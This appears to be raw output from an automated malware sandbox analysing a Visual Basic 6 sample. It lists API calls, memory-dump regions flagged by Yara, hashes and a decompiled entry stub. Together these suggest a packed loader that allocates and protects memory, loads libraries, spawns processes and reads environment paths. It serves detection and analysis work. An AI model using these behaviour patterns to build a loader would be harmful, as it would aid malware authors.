                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Char$Prev$Next
                  • String ID:
                  • API String ID: 3260447230-0
                  • Opcode ID: da7168159d48205b39b925e580ff9565556385f7329d86dcfb4afd195095243f
                  • Instruction ID: 03a39dfb8f8989532474c87f19a0a6a3fd830053b42f4bea0813feac589d7c88
                  • Opcode Fuzzy Hash: da7168159d48205b39b925e580ff9565556385f7329d86dcfb4afd195095243f
                  • Instruction Fuzzy Hash: ADF0F4B2805191BEE7331F298C8C9BBBF99CF8B375B1D427EE4D9C2005D2154C06A672
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: >8dq$L$Mz=.$d!$if$U
                  • API String ID: 1029625771-37203794
                  • Opcode ID: 8bbeb6a532311ff897ed5da461e839853885a38ad5e47fb5448bdccd7dbf96f4
                  • Instruction ID: 2af4a8e8b225df9b7034b7ad2ccc97a5b75796e0e0e49b404ba6146198555b2a
                  • Opcode Fuzzy Hash: 8bbeb6a532311ff897ed5da461e839853885a38ad5e47fb5448bdccd7dbf96f4
                  • Instruction Fuzzy Hash: 59924471A4034A9FDF349E78CEA47EA37B6BF55390F85412EDC899B244D7318A85CB02
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: d!$if
                  • API String ID: 0-935571250
                  • Opcode ID: 89203b47bcd4ed68432089db74aeb77f7c7d346d96ed27cf3cad5c50992c308f
                  • Instruction ID: 159e2de8b92c466ff75db14fa53f67cd4f58cc5e0948cf7fe23253cb48e31fdb
                  • Opcode Fuzzy Hash: 89203b47bcd4ed68432089db74aeb77f7c7d346d96ed27cf3cad5c50992c308f
                  • Instruction Fuzzy Hash: 63625771A4034A9FDF349E78CEA47DB37B2AF65790F85412EDC899B244D7318986CB02
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateProcessInternalW.KERNELBASE ref: 02AAD53E
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: CreateInternalProcess
                  • String ID: ^~R
                  • API String ID: 2186235152-2040817260
                  • Opcode ID: 9c3a79af555158877e7f89a52fe1a717c2ee80cb38782140e9fc4ce70ee80aef
                  • Instruction ID: ad77344dec111ab116e9b14dae81378af1ab59d3bd13aa040215fa859dd87176
                  • Opcode Fuzzy Hash: 9c3a79af555158877e7f89a52fe1a717c2ee80cb38782140e9fc4ce70ee80aef
                  • Instruction Fuzzy Hash: 9191F7B1A0074A8FDF389E38CAB47DA3763BF56360F95421ECC8A8B654C7358A45CB41
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateFileA.KERNELBASE(?,4CD2DC12,0B26EC40,0F2F3112,-00000001230DFA73,6D128917), ref: 02AA9134
                  • LoadLibraryA.KERNELBASE(?,00007DEE,?,868416F6,188EDDD0,02AA0225,-31ECBAA2,02AAA4EB,00000000,02AA01BE), ref: 02AAAC24
                  Memory Dump Source
                  • Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: CreateFileLibraryLoad
                  • String ID:
                  • API String ID: 2049390123-0
                  • Opcode ID: a25521c7871bb581af64c549cd6690df89255d743bf3385c05a8a9936935a7e3
                  • Instruction ID: 838c2a5c6de3d8be4a20fe7c890a1260d92524b7dcc3dc2472cfc44d9e6f31f2
                  • Opcode Fuzzy Hash: a25521c7871bb581af64c549cd6690df89255d743bf3385c05a8a9936935a7e3
                  • Instruction Fuzzy Hash: 90417972A40356CFDF309EA48ED67DB77A6AF29390F85412E8C889B206D3304985CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			_entry_() {
                  				signed char _t255;
                  				intOrPtr* _t256;
                  				void* _t381;
                  
                  				_push(0x401cac); // executed
                  				L004015D8(); // executed
                  				 *_t255 =  *_t255 + _t255;
                  				 *_t255 =  *_t255 + _t255;
                  				 *_t255 =  *_t255 + _t255;
                  				 *_t255 =  *_t255 ^ _t255;
                  				 *_t255 =  *_t255 + _t255;
                  				_t256 = _t255 + 1;
                  				 *_t256 =  *_t256 + _t256;
                  				 *_t256 =  *_t256 + _t256;
                  				 *_t256 =  *_t256 + _t256;
                  				 *((intOrPtr*)(_t381 + 0x14)) =  *((intOrPtr*)(_t381 + 0x14)) + _t381;
                  				asm("adc al, 0x23");
                  				asm("repe js 0x45");
                  			}







                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp
                  Similarity
                  • API ID: #100
                  • String ID:
                  • API String ID: 1341478452-0
                  • Opcode ID: f8d9d808b45ca36b6c9d886c0330c3aaafa30e87b7b161fba1fc9e67c5fedafb
                  • Instruction ID: 9897fe17b0eac189ff8b9ba8442e18036010c6a86b5813d9e986ccab0728a44b
                  • Opcode Fuzzy Hash: f8d9d808b45ca36b6c9d886c0330c3aaafa30e87b7b161fba1fc9e67c5fedafb
                  • Instruction Fuzzy Hash: ED428A7244E3C19FD7138B749DA51A27FB0AE1331431E06DBD4C18F1B3E2286A5AD766
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtAllocateVirtualMemory.NTDLL(74B904DF), ref: 02AA9451
                  • LoadLibraryA.KERNELBASE(?,00007DEE,?,868416F6,188EDDD0,02AA0225,-31ECBAA2,02AAA4EB,00000000,02AA01BE), ref: 02AAAC24
                  Memory Dump Source
                  • Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: AllocateLibraryLoadMemoryVirtual
                  • String ID:
                  • API String ID: 2616484454-0
                  • Opcode ID: 0ac3e1980febde36e88948c3cd3437fb2c3e03d8d526c1bde599b06b7247556d
                  • Instruction ID: 6c2e5bc07de766052b2db00abf4dfeb2cf6650e1aa2c8536b9b58a6a3d1893c2
                  • Opcode Fuzzy Hash: 0ac3e1980febde36e88948c3cd3437fb2c3e03d8d526c1bde599b06b7247556d
                  • Instruction Fuzzy Hash: 9951287564034BDBDF349E649CE47EB33A7AF6A394F95012DCC8A5B250DB314946CB01
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtProtectVirtualMemory.NTDLL ref: 02AACC6E
                  Memory Dump Source
                  • Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: 21430a46d46916f4295ac05b1a5efe101f77e8381a837929a2cb18c81a033ae2
                  • Instruction ID: 7ca04ca5b08439adfd08a0d17e8bcbd671c8bc5961515b6b908af521763b9300
                  • Opcode Fuzzy Hash: 21430a46d46916f4295ac05b1a5efe101f77e8381a837929a2cb18c81a033ae2
                  • Instruction Fuzzy Hash: 86014BB15082449FDB249F28C844AEEB7EAAFC4710F05441F9D89AB305CB719941CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaVarDup.MSVBVM60 ref: 004140F9
                  • #687.MSVBVM60(?,?), ref: 00414103
                  • __vbaDateVar.MSVBVM60(?), ref: 0041410D
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00414120
                  • #615.MSVBVM60 ref: 00414129
                  • __vbaVarDup.MSVBVM60 ref: 00414142
                  • __vbaVarDup.MSVBVM60 ref: 00414154
                  • #667.MSVBVM60(?), ref: 0041415A
                  • __vbaStrMove.MSVBVM60 ref: 0041416B
                  • #606.MSVBVM60(00000007,?,00000000), ref: 00414174
                  • __vbaStrMove.MSVBVM60 ref: 0041417F
                  • __vbaStrCmp.MSVBVM60(00000000), ref: 00414182
                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041419C
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004141AC
                  • #648.MSVBVM60(?), ref: 004141E7
                  • __vbaFreeVar.MSVBVM60 ref: 004141F3
                  • #696.MSVBVM60(snirl), ref: 0041422B
                  • #648.MSVBVM60(0000000A), ref: 0041425C
                  • __vbaFreeVar.MSVBVM60 ref: 00414268
                  • #648.MSVBVM60(0000000A), ref: 00414289
                  • __vbaFreeVar.MSVBVM60 ref: 00414295
                  • #696.MSVBVM60(jokergevinst), ref: 004142B2
                  • #648.MSVBVM60(0000000A), ref: 004142DA
                  • __vbaFreeVar.MSVBVM60 ref: 004142E6
                  • #539.MSVBVM60(0000000A,000000B9,0000009D,000000ED), ref: 0041433E
                  • __vbaVarCat.MSVBVM60(?,?,0000000A), ref: 0041435E
                  • __vbaStrVarMove.MSVBVM60(00000000), ref: 00414365
                  • __vbaStrMove.MSVBVM60 ref: 00414370
                  • __vbaStrCopy.MSVBVM60 ref: 00414377
                  • __vbaFreeStr.MSVBVM60 ref: 00414380
                  • __vbaFreeVarList.MSVBVM60(00000002,0000000A,?), ref: 00414390
                  • #685.MSVBVM60 ref: 00414399
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004143A4
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028B8,0000001C), ref: 004143C8
                  • #685.MSVBVM60 ref: 004143CE
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004143D9
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028B8,0000001C), ref: 004143FD
                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00414430
                  • #685.MSVBVM60 ref: 0041445E
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00414469
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004028B8,0000001C), ref: 0041448D
                  • __vbaStrCopy.MSVBVM60 ref: 0041449B
                  • __vbaFreeStr.MSVBVM60 ref: 004144C9
                  • __vbaFreeObj.MSVBVM60 ref: 004144D2
                  • #647.MSVBVM60(?,?), ref: 004144EE
                  • __vbaStrVarVal.MSVBVM60(?,?), ref: 004144FC
                  • #696.MSVBVM60(00000000), ref: 00414503
                  • __vbaStrI4.MSVBVM60(001B150A,?), ref: 0041451D
                  • __vbaStrMove.MSVBVM60 ref: 00414528
                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041454A
                  • __vbaFreeVarList.MSVBVM60(00000002,0000000A,?), ref: 0041455A
                  • #648.MSVBVM60(0000000A), ref: 00414575
                  • __vbaStrCopy.MSVBVM60 ref: 00414590
                  • __vbaStrMove.MSVBVM60 ref: 004145D3
                  • __vbaFreeStr.MSVBVM60 ref: 004145D8
                  • __vbaFreeVar.MSVBVM60 ref: 004145E1
                  • #588.MSVBVM60(0000007D,00000062,00000030), ref: 004145ED
                  • #564.MSVBVM60(0000000A,?), ref: 0041460F
                  • __vbaHresultCheck.MSVBVM60(00000000), ref: 0041461A
                  • __vbaI4Var.MSVBVM60(?,?,003C43B0), ref: 00414656
                  • __vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 00414689
                  • #525.MSVBVM60(000000DC), ref: 00414697
                  • __vbaStrMove.MSVBVM60 ref: 004146A2
                  • __vbaStrMove.MSVBVM60(000011FB), ref: 004146B8
                  • __vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 004146DB
                  • #648.MSVBVM60(00000004), ref: 004146F6
                  • __vbaFreeVar.MSVBVM60 ref: 00414714
                  • __vbaStrCopy.MSVBVM60 ref: 00414728
                  • __vbaFreeStr.MSVBVM60 ref: 00414754
                  • #564.MSVBVM60(0000000A,?), ref: 0041476C
                  • __vbaHresultCheck.MSVBVM60(00000000), ref: 00414777
                  • __vbaStrCopy.MSVBVM60 ref: 00414785
                  • __vbaI4Var.MSVBVM60(?,Backbends,00002576), ref: 00414796
                  • __vbaFreeStr.MSVBVM60 ref: 004147AB
                  • __vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 004147B7
                  • __vbaFreeStr.MSVBVM60(00414855), ref: 0041484E
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$Free$List$Move$#648$CheckCopyHresult$#685#696$#564$#525#539#588#606#615#647#667#687Date
                  • String ID: (dJHV\v%$5/5/5$Backbends$Bini$Demiskrdderiets$Fornuftsvsenerne9$Heptapetalous$Satsformatets9$Sindbilleders$Tollbooths$V\F?$appdata$jokergevinst$lhK$snirl$v%
                  • API String ID: 3357908344-2975458384
                  • Opcode ID: 9b1611adf4f31b7e92446710739a5da99c43d90eddc75e96beabdcc194418b04
                  • Instruction ID: b2da97133f39f2931aec7c94cf46d8fbaa4b880c89f28eb509041dbe891ca617
                  • Opcode Fuzzy Hash: 9b1611adf4f31b7e92446710739a5da99c43d90eddc75e96beabdcc194418b04
                  • Instruction Fuzzy Hash: 3A325DB1900219DFDB14DFA4DD88EDEBBB8FF48300F108529E646A7290EB74A549CF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaStrCopy.MSVBVM60 ref: 0041508E
                  • __vbaVarDup.MSVBVM60 ref: 004150AD
                  • #617.MSVBVM60(?,?,0000006C), ref: 004150BD
                  • __vbaVarTstGt.MSVBVM60(?,?), ref: 004150D9
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004150F2
                  • #611.MSVBVM60 ref: 004150FC
                  • __vbaStrMove.MSVBVM60 ref: 0041510D
                  • __vbaVarDup.MSVBVM60 ref: 00415123
                  • #518.MSVBVM60(?,?), ref: 00415131
                  • __vbaStrVarMove.MSVBVM60(?), ref: 0041513B
                  • __vbaStrMove.MSVBVM60 ref: 00415146
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415152
                  • #610.MSVBVM60(?), ref: 00415163
                  • __vbaStrVarVal.MSVBVM60(?,?), ref: 00415171
                  • #540.MSVBVM60(?,00000000), ref: 0041517C
                  • _adj_fdiv_m64.MSVBVM60 ref: 004151A5
                  • _adj_fdiv_m64.MSVBVM60(00000008,?), ref: 004151D6
                  • __vbaVarTstGe.MSVBVM60(00000008,?), ref: 004151E8
                  • __vbaFreeStr.MSVBVM60 ref: 004151F8
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415208
                  • __vbaNew2.MSVBVM60(004029E8,0041746C), ref: 0041522C
                  • __vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,00000014), ref: 00415251
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,00000140), ref: 0041527E
                  • __vbaFreeObj.MSVBVM60 ref: 00415298
                  • #539.MSVBVM60(?,000000D7,000000D9,000000F9), ref: 004152B1
                  • __vbaStrVarMove.MSVBVM60(?), ref: 004152BB
                  • __vbaStrMove.MSVBVM60 ref: 004152C6
                  • __vbaFreeVar.MSVBVM60 ref: 004152CB
                  • __vbaVarDup.MSVBVM60 ref: 004152E5
                  • #645.MSVBVM60(?,00000000), ref: 004152F0
                  • __vbaStrMove.MSVBVM60 ref: 004152FB
                  • __vbaFreeVar.MSVBVM60 ref: 00415300
                  • __vbaFreeStr.MSVBVM60(00415362), ref: 00415350
                  • __vbaFreeStr.MSVBVM60 ref: 00415355
                  • __vbaFreeStr.MSVBVM60 ref: 0041535A
                  • __vbaFreeStr.MSVBVM60 ref: 0041535F
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$Free$Move$List$CheckHresult_adj_fdiv_m64$#518#539#540#610#611#617#645CopyNew2
                  • String ID: DELIKATESSER$Dorsally4$Kielbasa4$disinhabit
                  • API String ID: 1529234513-2571534993
                  • Opcode ID: 4bc5372a1db0a8b17610c9feecec8e73afd5386ded283a3b95bc48e361337743
                  • Instruction ID: d0022da710132c39d04a457d4db14dc12b6dad0a9a363c05a2efa2b7a27b2b3c
                  • Opcode Fuzzy Hash: 4bc5372a1db0a8b17610c9feecec8e73afd5386ded283a3b95bc48e361337743
                  • Instruction Fuzzy Hash: 53912971D00229DBCB05DFE4DD88AEEBB78FB48704F10812AE506B72A0DB745949CF99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaVarDup.MSVBVM60 ref: 00415E4E
                  • #667.MSVBVM60(?), ref: 00415E54
                  • __vbaVarDup.MSVBVM60 ref: 00415E79
                  • #666.MSVBVM60(?,?), ref: 00415E83
                  • __vbaInStrVar.MSVBVM60(?,00000000,?,?,00000028), ref: 00415EAC
                  • __vbaVarTstGe.MSVBVM60(00008002,00000000), ref: 00415EBA
                  • __vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?), ref: 00415ED9
                  • __vbaVarDup.MSVBVM60 ref: 00415F04
                  • #619.MSVBVM60(?,?,000000A6), ref: 00415F13
                  • __vbaStrVarMove.MSVBVM60(?), ref: 00415F1D
                  • __vbaStrMove.MSVBVM60 ref: 00415F28
                  • __vbaStrCopy.MSVBVM60 ref: 00415F39
                  • __vbaFreeStr.MSVBVM60 ref: 00415F42
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415F52
                  • __vbaNew2.MSVBVM60(004029E8,0041746C), ref: 00415F6E
                  • __vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,00000014), ref: 00415F93
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,000000F0), ref: 00415FBD
                  • __vbaStrMove.MSVBVM60 ref: 00415FD0
                  • __vbaFreeObj.MSVBVM60 ref: 00415FD9
                  • __vbaFreeStr.MSVBVM60(0041604C), ref: 00416045
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$Free$Move$CheckHresultList$#619#666#667CopyNew2
                  • String ID: $r$(j$Haandstrgen5$userprofile$windir
                  • API String ID: 877882336-2823200559
                  • Opcode ID: 32618bed8d1ad747d99c005c47570e813bd95182c1f9a5c9111e887b9abf36c1
                  • Instruction ID: 7f448852560e641fdbdfc2a89b6be07636c93bd5e1d8e21f7918077c7996ffb9
                  • Opcode Fuzzy Hash: 32618bed8d1ad747d99c005c47570e813bd95182c1f9a5c9111e887b9abf36c1
                  • Instruction Fuzzy Hash: 3BB10771900219EFCB14DFA4DD89AEEBBB8FB48700F10816AF505B72A0DB746949CF95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryA.KERNELBASE(?,00007DEE,?,868416F6,188EDDD0,02AA0225,-31ECBAA2,02AAA4EB,00000000,02AA01BE), ref: 02AAAC24
                  Memory Dump Source
                  • Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 2b897d6ae61591dec36333f35d953f7e3fc3757dc0803dd7a354651b43d5d6c0
                  • Instruction ID: fc940790dd71095095f7ff1b8587a0c036ad5276ab9f6876f93ee9ddf9ebbeb9
                  • Opcode Fuzzy Hash: 2b897d6ae61591dec36333f35d953f7e3fc3757dc0803dd7a354651b43d5d6c0
                  • Instruction Fuzzy Hash: 4D212471B003599BDF209F55CAD87DF3BA7EF59790F804029ED199B201EB304D098B90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryA.KERNELBASE(?,00007DEE,?,868416F6,188EDDD0,02AA0225,-31ECBAA2,02AAA4EB,00000000,02AA01BE), ref: 02AAAC24
                  Memory Dump Source
                  • Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 6c19c3c04bc56b27ae1440155d9b4a0ac8c5d8188aeb3f8581f4acdb30cacd52
                  • Instruction ID: f86138605d317038a7258e394573e16c229a4db8fcd45c6416a7bd88ce9852bc
                  • Opcode Fuzzy Hash: 6c19c3c04bc56b27ae1440155d9b4a0ac8c5d8188aeb3f8581f4acdb30cacd52
                  • Instruction Fuzzy Hash: F0014572A013598BEF205F558EE87DB2BE6EF19780FC100298D486B242D7344A0D8F91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • TerminateProcess.KERNELBASE ref: 02AA8DF5
                  Memory Dump Source
                  • Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: ProcessTerminate
                  • String ID:
                  • API String ID: 560597551-0
                  • Opcode ID: f6098cd16437af894264de40a40fe5a9b75b5b703e0cc19bb9b06579aec2609e
                  • Instruction ID: 696de682d39887dc0897c9e11ff896c245e84bd6de7de8f78307ce855465abfb
                  • Opcode Fuzzy Hash: f6098cd16437af894264de40a40fe5a9b75b5b703e0cc19bb9b06579aec2609e
                  • Instruction Fuzzy Hash: 4EE092702093499EC7442F3086977FFBBB5AF12384F0B085DDCC38906597664088C613
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: LibraryLoadMemoryProtectVirtual
                  • String ID: !.(o$+(8
                  • API String ID: 3389902171-375622954
                  • Opcode ID: 2346065d3f47523c0127dc2195423d5a0027ae463570ac6df8e1069eec935c71
                  • Instruction ID: 77580e218b2266dc0e8f6c0c647bba2f0d0b5b1a55f44b8adcfc969172b4e9f5
                  • Opcode Fuzzy Hash: 2346065d3f47523c0127dc2195423d5a0027ae463570ac6df8e1069eec935c71
                  • Instruction Fuzzy Hash: 6C4217716043868FDB35DF3889E87DA7BE29F12360F49826ECCDA8B296D7348545C712
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eb58c6e6142cfcf5205c220f1ba8c5c1a19718c468c36bd49c3800af5371a692
                  • Instruction ID: 5c688f4676706ac4c6a330da449b58eb6de5c9490a6ab47a7a29c4d48c134bed
                  • Opcode Fuzzy Hash: eb58c6e6142cfcf5205c220f1ba8c5c1a19718c468c36bd49c3800af5371a692
                  • Instruction Fuzzy Hash: A9115A70700345DFDB28CF64D9E4BEA73E2AFAA754F85842AD8498B354DB309908CB25
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 914305d23a34769534fef598e15e06e577ccbf0e3e660d09fd95584388f0ecd0
                  • Instruction ID: c638bfc64a3d9fb192b3716ecc59b87cf8a757dc463159480d3de8eb458c8748
                  • Opcode Fuzzy Hash: 914305d23a34769534fef598e15e06e577ccbf0e3e660d09fd95584388f0ecd0
                  • Instruction Fuzzy Hash: FAC09B36351640DFCB51CE8DC1D0FD073F5BB14650F814498714597621C754D805C604
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, Offset: 02AA0000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bce094c17ff0539a258680c68828e6b2e04563b7050298198bf5bfd946f81cbb
                  • Instruction ID: 5b670ab87fa907e8e1f6c664c1979a7ea21b275b375c65bc76afbf94becd050e
                  • Opcode Fuzzy Hash: bce094c17ff0539a258680c68828e6b2e04563b7050298198bf5bfd946f81cbb
                  • Instruction Fuzzy Hash: 0EC092B63006C18FFF0ADE08C582B8173B1FB25AC4B0944D4E442CB612C329E904CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaStrCopy.MSVBVM60 ref: 00415984
                  • #582.MSVBVM60(36680000,4202A278), ref: 00415990
                  • __vbaFpR8.MSVBVM60 ref: 00415996
                  • __vbaStrCopy.MSVBVM60 ref: 004159B9
                  • #712.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159CD
                  • __vbaStrMove.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159DE
                  • __vbaStrCopy.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159E4
                  • __vbaFreeStr.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159E9
                  • #512.MSVBVM60(NAVIGATIONSSKOLERNES,00000081,?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159F9
                  • __vbaStrMove.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 00415A04
                  • __vbaVarDup.MSVBVM60 ref: 00415A22
                  • #558.MSVBVM60(?), ref: 00415A2C
                  • __vbaFreeVar.MSVBVM60 ref: 00415A49
                  • #716.MSVBVM60(?,WScript.Shell,00000000), ref: 00415A5F
                  • __vbaObjVar.MSVBVM60(?), ref: 00415A69
                  • __vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00415A74
                  • __vbaFreeVar.MSVBVM60 ref: 00415A7D
                  • __vbaLateMemCallLd.MSVBVM60(?,?,Environment,00000001), ref: 00415ADB
                  • __vbaVarLateMemCallLd.MSVBVM60(?,00000000), ref: 00415AE9
                  • __vbaStrVarMove.MSVBVM60(00000000), ref: 00415AF3
                  • __vbaStrMove.MSVBVM60 ref: 00415AFE
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415B0A
                  • __vbaNew2.MSVBVM60(004029E8,0041746C), ref: 00415B26
                  • __vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,00000014), ref: 00415B4B
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,0000013C), ref: 00415B9C
                  • __vbaFreeObj.MSVBVM60 ref: 00415BA5
                  • #610.MSVBVM60(?), ref: 00415BBB
                  • __vbaStrVarVal.MSVBVM60(?,?), ref: 00415BC9
                  • #540.MSVBVM60(?,00000000), ref: 00415BD4
                  • _adj_fdiv_m64.MSVBVM60 ref: 00415BFD
                  • _adj_fdiv_m64.MSVBVM60 ref: 00415C29
                  • __vbaVarTstGe.MSVBVM60(?,?), ref: 00415C40
                  • __vbaFreeStr.MSVBVM60(?,?), ref: 00415C4C
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?), ref: 00415C5C
                  • __vbaNew2.MSVBVM60(004029E8,0041746C), ref: 00415C81
                  • __vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,00000014), ref: 00415CA6
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,00000140), ref: 00415CD3
                  • __vbaFreeObj.MSVBVM60 ref: 00415CED
                  • #539.MSVBVM60(?,0000009D,000000BE,000000E5), ref: 00415D06
                  • __vbaStrVarMove.MSVBVM60(?), ref: 00415D10
                  • __vbaStrMove.MSVBVM60 ref: 00415D1B
                  • __vbaStrCopy.MSVBVM60 ref: 00415D25
                  • __vbaFreeStr.MSVBVM60 ref: 00415D2E
                  • __vbaFreeVar.MSVBVM60 ref: 00415D37
                  • __vbaFreeObj.MSVBVM60(00415D8A), ref: 00415D6E
                  • __vbaFreeStr.MSVBVM60 ref: 00415D7D
                  • __vbaFreeStr.MSVBVM60 ref: 00415D82
                  • __vbaFreeStr.MSVBVM60 ref: 00415D87
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp
                  Similarity
